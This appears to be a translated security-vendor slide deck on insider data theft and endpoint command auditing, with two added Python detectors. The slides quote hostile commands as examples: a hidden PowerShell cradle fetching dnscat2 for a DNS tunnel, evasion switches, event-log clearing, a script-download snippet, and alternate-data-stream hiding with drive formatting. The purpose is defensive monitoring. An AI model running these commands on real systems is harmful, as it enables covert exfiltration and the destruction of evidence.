Confronting insider threats head-on: is the company the victim, or was the employee hacked?
FineArt - Victor Chen
Cyber risk stays in the global Top 5, with data theft ranked above cyberattacks (The Global Risks Report 2019, 14th Edition)
http://www3.weforum.org/docs/WEF_Global_Risks_Report_2019.pdf
(Figure: The Global Risks Landscape 2019, plotted by likelihood against impact; Top 5 Global Risks in Terms of Likelihood)
The six sectors of greatest interest to intelligence collectors
Source: 2018 Foreign Economic Espionage in Cyberspace report, https://www.dni.gov/files/NCSC/documents/news/20180724-economic-espionage-pub.pdf
Industry Priority Sectors / Technologies

Energy / Alternative Energy
• Advanced pressurized water reactor and high-temperature, gas-cooled nuclear power stations
• Biofuels
• Energy-efficient industries
• Oil, gas, and coalbed methane development, including fracking
• Smart grids
• Solar energy technology
• Wind turbines

Biotechnology
• Advanced medical devices
• Biomanufacturing and chemical manufacturing
• Biomaterials
• Biopharmaceuticals
• Genetically modified organisms
• Infectious disease treatment
• New vaccines and drugs

Defense
• Aerospace & aeronautic systems
• Armaments
• Marine systems
• Radar
• Optics

Environmental Protection
• Batteries
• Energy-efficient appliances
• Green building materials
• Hybrid and electric cars
• Waste management
• Water/air pollution control

High-end Manufacturing
• 3D printing
• Advanced robotics
• Aircraft engines
• Aviation maintenance and service sectors
• Civilian aircraft
• Electric motors
• Foundational manufacturing equipment
• High-end computer numerically controlled machines
• High-performance composite materials
• High-performance sealing materials
• Integrated circuit manufacturing equipment and assembly technology
• Space infrastructure and exploration technology
• Synthetic rubber

Information and Communications Technology
• Artificial intelligence
• Big data analysis
• Core electronics industries
• E-commerce services
• Foundational software products
• High-end computer chips
• Internet of Things
• Network equipment
• Next-generation broadband wireless communications networks
• Quantum computing and communications
• Rare-earth materials
R&D is the lifeblood of the enterprise, yet the hardest part to manage
The R&D engineer's working environment (diagram): the R&D workstation connected to JTAG, development boards, servers (data / DB), IDE applications, source code, RJ-45 networking, HDL tools, simulators, in-circuit test, CAx / EDA tools, layout / PCB tools, and DB / SVN / file / test machines.
SVS + SVT: protecting the use of R&D development tools
Control points around the IDE application (diagram):
• System & DLL: system calls, output files
• Network API: download / upload, tunnel / cloud applications, custom protocols
• CMD & Shell: CMD, PowerShell scripts, running executables (EXE)
• Hardware: connecting to hardware devices
• 3rd-party applications: screen / video capture, print to image, pipe processes (IPC)
• R&D key verification; screen capture
SVS + SVT: complete protection of R&D intellectual property
R&D project development PC, prohibited / controlled operations:
• Many operations can be restricted: printing, PrtScr, IPC
• CTRL-C + CTRL-V: controlled; the number of characters pasted out can be limited
• SVT allowed: SVN and development boards can be used normally
Demo 1: Visual Studio output is protected, and the system defends
• Files are protected the moment Visual Studio saves them
• Visual Studio policy defense: Prohibited Call System
Defense and control can be tailored to the specialized tools of each industry, ensuring intellectual assets do not leak.
Risks in the command-line environment: how much do security and audit know?
IT security and audit teams should understand the applications used by R&D units.
OS default functions & applications: Cmd.exe, Windows PowerShell, PowerShell ISE
IDE-invoked commands: calls to cmd.exe, calls to PowerShell, calls to executables
3rd-party applications: ConEmu, PSReadLine, PSGet, Chocolatey, Babun (optional), Cmder, Git Bash (MinGW & MinTTY), WSL (Ubuntu on Windows), Cygwin, Xshell, Console2, PowerShell ISE, PowerShell, Dell PowerGUI, SAPIEN PowerShell Studio, AWS Tools for PowerShell, Adam Driscoll's PowerShell, PowerShell Web Access, Master-PowerShell, VMware vSphere PowerCLI
Analysis of the CMD and PowerShell environments (diagram): SDK commands and scripts ({ }); cmd trail recording; SVS secure disk; software security control; process recording; network behaviour recording; SVT encrypted channel.
A small example shows why command-trail recording matters

Clearing all event logs:
Clear-EventLog -LogName System
Clear-EventLog -LogName Security
Clear-EventLog -LogName Application

DNS tunnel with PowerShell (dnscat2.ps1):
powershell.exe -nop -w hidden -c {IEX(New-Object System.Net.Webclient).DownloadString('https://pt.cyber-redteam.info/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain dnsch.cirrus.[domain] -PreSharedSecret dnschcirrus}

PowerShell dodge (switches that hide the window or loosen execution):
-WindowStyle hidden / -w hidden
-Exec Bypass
-Command / -c
-EncodedCommand / -e / -Enc
-Nop / -NoProfile

Three ways to download files with PowerShell:
1. Invoke-WebRequest
2. System.Net.WebClient: (New-Object System.Net.WebClient).DownloadFile() and (New-Object System.Net.WebClient).DownloadString()
3. Start-BitsTransfer

$url = "http://pt.cyber-redteam.info/risktest/Obfuscator.txt"
$output = "$PSScriptRoot\real.ps1"
$start_time = Get-Date
$readteam = New-Object System.Net.WebClient
$readteam.DownloadFile($url, $output)
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"

Code obfuscators:
Crunchcode (VBA)
ScriptCryptor (VBA, JavaScript)
CodeProtection (VBA)
Vbad (VBA)
Stunnix (C++, Perl, JavaScript, VBScript)
Scripts Encryptor (HTML, JavaScript/JScript, C/C++/MFC)
ISESteroids (PowerShell)
Demo 2: Recording the command trail of various command behaviours: Invoke-Obfuscation, and Teensy + Alternate Data Streams (ADS)
Time User Application Command Department FullName Computer IP PID StoredAt
2019/03/12 DEMO01 powershell.exe Import-Module ./Invoke-Obfuscation.psd1 IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\Invoke-Obfuscation-master\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\Desktop\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12
2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12
2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\Desktop\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\user\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\Users\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe cd\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe copy c:\User\user\Desktop\XConsole.exe d: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\user\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\Users\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe cd\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
Time User Application Command Department FullName Computer IP PID StoredAt
2019/03/12 DEMO01 CMD.exe wordpad fake.docx:AI.DOCX IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe wordpad fake.docx IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe wordpade fake.docx IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe wordpade f wordpade fake.docx IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe DEL AI.DOCX IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe WMIC DATAFILE WHERE DRIVE='C:' AND eXTENSION='DOCX' LIST IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe TYPE AI.DOCX>>FAKE.DOCX:AI.DOCX IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe COPY D:AI.DOCX E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe COPY D:FAKE.DOCX E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe FORMAT E: /FS:NTFS /Q /V:ads IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 cmd.exe ipconfig IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 8708 2019/03/12
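The following added example is not FineArt's code and is not part of the original slides. It is a small Python detector that reads command-trail records in the ten-column layout of the tables above and flags the behaviours shown in the "small example" slide and in Demo 2: event-log clearing, the PowerShell dodge switches (with any -EncodedCommand payload decoded before matching), download cradles, alternate-data-stream references, formatting a volume, and loading Invoke-Obfuscation. Everything it consumes is constructed: the tab-separated layout, the record contents, the example.invalid host and the per-process scoring threshold are assumptions, not the product's format or data.

```python
"""Detection rules over endpoint command-trail records (added example).

Assumed input format: one record per line, ten tab-separated columns in the
order of the table above. All sample records below are constructed.
"""
import base64
import re
from collections import defaultdict

FIELDS = ("time", "user", "app", "command", "dept", "fullname",
          "host", "ip", "pid", "stored")

# Constructed: what a hidden, encoded download cradle looks like once logged.
# example.invalid is a placeholder host, not a real download source.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"
    .encode("utf-16-le")).decode("ascii")


def _rec(app, command, pid):
    """Build one constructed record in the assumed tab-separated layout."""
    return "\t".join(["2019/03/12", "DEMO01", app, command, "IT", "demo01",
                      "DESKTOP-0QTVR1U", "192.168.218.1", pid, "2019/03/12"])


SAMPLE_LOG = "\n".join([
    _rec("powershell.exe", "Import-Module ./Invoke-Obfuscation.psd1", "5056"),
    _rec("powershell.exe", "Clear-EventLog -LogName Security", "5056"),
    _rec("powershell.exe", "powershell.exe -nop -w hidden -enc " + ENCODED, "5056"),
    _rec("CMD.exe", "wordpad fake.docx:AI.DOCX", "5096"),
    _rec("CMD.exe", "TYPE AI.DOCX>>FAKE.DOCX:AI.DOCX", "5096"),
    _rec("CMD.exe", "FORMAT E: /FS:NTFS /Q /V:ads", "5096"),
    _rec("cmd.exe", "ipconfig", "8708"),
])

ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

RULES = (
    # Wiping Windows event logs, as in the Clear-EventLog example above.
    ("event-log-clearing",
     re.compile(r"\bClear-EventLog\b|\bwevtutil\s+cl\b", re.I)),
    # The "PowerShell dodge" switches listed above.
    ("powershell-evasion-switch",
     re.compile(r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile\b"
                r"|exec(?:utionpolicy)?\s+bypass|e(?:c|nc|ncodedcommand)?\s)", re.I)),
    # The three download methods plus the IEX cradle.
    ("download-cradle",
     re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"
                r"|Start-BitsTransfer|\bIEX\b|Invoke-Expression", re.I)),
    # file.ext:stream references (ADS). The lookbehind skips host:port inside
    # URLs (preceded by '/'), the lookahead skips drive letters such as C:.
    ("alternate-data-stream",
     re.compile(r"(?<![:/\w])(?![A-Za-z]:)[\w-]+(?:\.[\w-]+)+:[\w.-]+")),
    ("obfuscation-tooling", re.compile(r"Invoke-Obfuscation", re.I)),
    # Formatting a volume (here the removable drive) destroys the evidence.
    ("volume-format", re.compile(r"^\s*FORMAT\s+[A-Z]:", re.I)),
)


def parse_records(text):
    """Parse tab-separated command-trail records into dicts (assumed format)."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\t")
        if len(parts) != len(FIELDS):
            raise ValueError(f"malformed record: {line!r}")
        records.append(dict(zip(FIELDS, parts)))
    return records


def decode_encoded_command(command):
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or ''."""
    m = ENCODED_RE.search(command)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(text):
    """Apply every rule to every record (decoded payload included).

    Returns (findings, by_pid): findings is a list of (pid, app, rule) and
    by_pid maps each process ID to the set of rules it tripped.
    """
    findings = []
    by_pid = defaultdict(set)
    for rec in parse_records(text):
        decoded = decode_encoded_command(rec["command"])
        haystack = rec["command"] + ("\n" + decoded if decoded else "")
        for name, pattern in RULES:
            if pattern.search(haystack):
                findings.append((rec["pid"], rec["app"], name))
                by_pid[rec["pid"]].add(name)
    return findings, dict(by_pid)


def risk_level(rules):
    """Assumed scoring: two or more distinct rules in one process is 'high'."""
    return "high" if len(rules) >= 2 else "medium" if rules else "none"


if __name__ == "__main__":
    findings, by_pid = analyze(SAMPLE_LOG)
    for pid, rules in sorted(by_pid.items()):
        print(pid, risk_level(rules), sorted(rules))
```

Run as a script it prints one line per process ID. The grouping by PID is the point: a single `dir` or `cd` tells an auditor nothing, while a session whose PID shows Invoke-Obfuscation being loaded, Security log clearing and a hidden encoded download is the one to pull first, and the ADS and FORMAT lines in the second table only make sense when read together as one session.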
Internal network activity: is there a security risk?
Analyzing the enterprise network architecture. Three enterprise network postures:
1. External network services blocked
2. External network services partially open (physical isolation)
3. External network services open

External network services: external DNS, official website, external mail
Internal network services: internal DNS, executive information system, internal mail, SVN, CRM, ERP, data warehouse, endpoint devices, others
Security protection and network architecture: firewalls of all types, VPN, cloud architecture, branch-office network architecture
External devices: unattended devices, devices taken on business trips, mobile devices, VoIP, WiFi
Endpoint network activity: finding the risk. Each event is examined along five dimensions (who, where, what, object, when):
Role (who): 1. employee 2. hacker 3. OS 4. process
IP/Domain (where): Internet / Intranet / Localhost; whitelist, blacklist, risk targets, watch list; source / destination
Channel: Normal, Proxy, Tunnel, SVT
Port: whitelist, blacklist, alert ports
Protocol: TCP, UDP, DNS, other custom protocols
Action (what): copy / delete, rename / duplicate, move file, upload file, paste text, drag file
Software: IM, FTP, P2P, Tor network
Items of interest (object): file size, file count, frequency rules, file changes, file name, file hash
Time (when): working hours, after hours, midnight
Takeafile & OnionShare 2.0: defense and network logging
• Block all file drags into the browser
• Block application execution, and block dragging files into the browser
• Record network connection behaviour (destination: the onion network); record network connection behaviour (UDP)
https://takeafile.com/
Time User IP URL Application
2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/peso-linguini onionshare-gui.exe
2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/img/favicon.ico onionshare-gui.exe
2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/css/style.css onionshare-gui.exe
2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/peso-linguini/download onionshare-gui.exe
2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/img/web_file.png onionshare-gui.exe
2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/img/logo.png onionshare-gui.exe
Time Source Destination Protocol Length Info
5.154527 192.168.1.188 192.168.1.170 DTLSv1.2 1279 Application Data
5.154641 192.168.1.188 192.168.1.170 DTLSv1.2 1279 Application Data
5.154648 192.168.1.170 192.168.1.188 DTLSv1.2 107 Application Data
5.154648 192.168.1.170 192.168.1.188 DTLSv1.2 107 Application Data
5.154649 192.168.1.170 192.168.1.188 DTLSv1.2 107 Application Data
5.154703 192.168.1.188 192.168.1.170 DTLSv1.2 1279 Application Data
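As an added example (not FineArt's code and not part of the original slides), the following Python scores endpoint network events along the who / where / what / when dimensions of the endpoint-activity table above, over constructed records modelled on the browsing-log and packet-capture columns just shown. The intranet range, the browser allowlist, the sanctioned DTLS peers, the working-hours window, the placeholder .onion host, the 198.51.100.5 documentation address and the scores are all assumptions.

```python
"""Scoring endpoint network events along who / where / what / when
(added example; the policy tables and sample records are constructed)."""
import ipaddress
from datetime import datetime
from urllib.parse import urlparse

# Assumed policy tables.
INTRANET = ipaddress.ip_network("192.168.0.0/16")        # assumed corporate range
ALLOWED_BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}   # assumed allowlist
SANCTIONED_DTLS_PEERS = {"192.168.1.10"}   # assumed VoIP / WiFi controller that may use DTLS
WORK_HOURS = range(8, 19)                  # 08:00-18:59 counts as on duty

# Constructed browsing-log records: time, user, IP, URL, application.
# The .onion host is a placeholder, not a real address.
BROWSE_LOG = "\n".join([
    "2019/03/12 15:54\tDEMO01\t192.168.218.1\t"
    "http://placeholderonionaddress.onion/peso-linguini/download\tonionshare-gui.exe",
    "2019/03/12 23:10\tDEMO01\t192.168.218.1\thttps://takeafile.com/\tchrome.exe",
    "2019/03/12 10:02\tDEMO02\t192.168.218.2\thttp://192.168.218.10/svn/trunk\tchrome.exe",
])

# Constructed UDP flow summaries, modelled on the packet-capture columns above.
FLOWS = [
    {"time": 5.154527, "src": "192.168.1.188", "dst": "192.168.1.170", "proto": "DTLSv1.2", "length": 1279},
    {"time": 5.201000, "src": "192.168.1.188", "dst": "192.168.1.10", "proto": "DTLSv1.2", "length": 210},
    {"time": 5.302000, "src": "192.168.1.188", "dst": "198.51.100.5", "proto": "DNS", "length": 70},
]


def parse_browse_log(text):
    """Parse the assumed tab-separated browsing-log layout into dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, user, ip, url, app = line.split("\t")
        records.append({"time": datetime.strptime(when, "%Y/%m/%d %H:%M"),
                        "user": user, "ip": ip, "url": url, "app": app})
    return records


def classify_destination(url):
    """'tor' for .onion hosts, 'intranet' for addresses in INTRANET, else 'internet'."""
    host = urlparse(url).hostname or ""
    if host.endswith(".onion"):
        return "tor"
    try:
        return "intranet" if ipaddress.ip_address(host) in INTRANET else "internet"
    except ValueError:          # a DNS name rather than an address
        return "internet"


def assess_browse(rec):
    """Score one browsing record; returns (score, [(dimension, reason, points)])."""
    reasons = []
    if classify_destination(rec["url"]) == "tor":
        reasons.append(("where", "tor-destination", 50))
    if rec["app"].lower() not in ALLOWED_BROWSERS:
        reasons.append(("what", "non-browser-http-client", 30))
    if rec["time"].hour not in WORK_HOURS:
        reasons.append(("when", "off-hours", 10))
    return sum(r[2] for r in reasons), reasons


def assess_flow(flow):
    """Flag DTLS exchanged directly between two intranet hosts, neither of
    which is a sanctioned peer: the shape of a WebRTC-style transfer that
    never passed a proxy."""
    reasons = []
    src, dst = ipaddress.ip_address(flow["src"]), ipaddress.ip_address(flow["dst"])
    if (flow["proto"].startswith("DTLS") and src in INTRANET and dst in INTRANET
            and flow["src"] not in SANCTIONED_DTLS_PEERS
            and flow["dst"] not in SANCTIONED_DTLS_PEERS):
        reasons.append(("where", "peer-to-peer-dtls-on-lan", 40))
    return sum(r[2] for r in reasons), reasons


def highest_score_per_user(records):
    """Who: the worst single browsing event per user account."""
    best = {}
    for rec in records:
        score, _ = assess_browse(rec)
        best[rec["user"]] = max(score, best.get(rec["user"], 0))
    return best


if __name__ == "__main__":
    for rec in parse_browse_log(BROWSE_LOG):
        print(rec["user"], rec["url"], assess_browse(rec))
    for flow in FLOWS:
        print(flow["src"], "->", flow["dst"], assess_flow(flow))
```

The two assessments answer the two logging slides separately: the browsing log catches the onion-network destination and the fact that the HTTP client is onionshare-gui.exe rather than a browser, while the flow check catches what the packet capture shows, DTLS flowing directly between two workstations. Browser-based transfer tools use WebRTC data channels, which run on DTLS, so that peer-to-peer pattern is what to watch for when the destination is not an onion address at all.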
Enterprise leak prevention: for information security, look for a premium product.
www.fineart-tech.com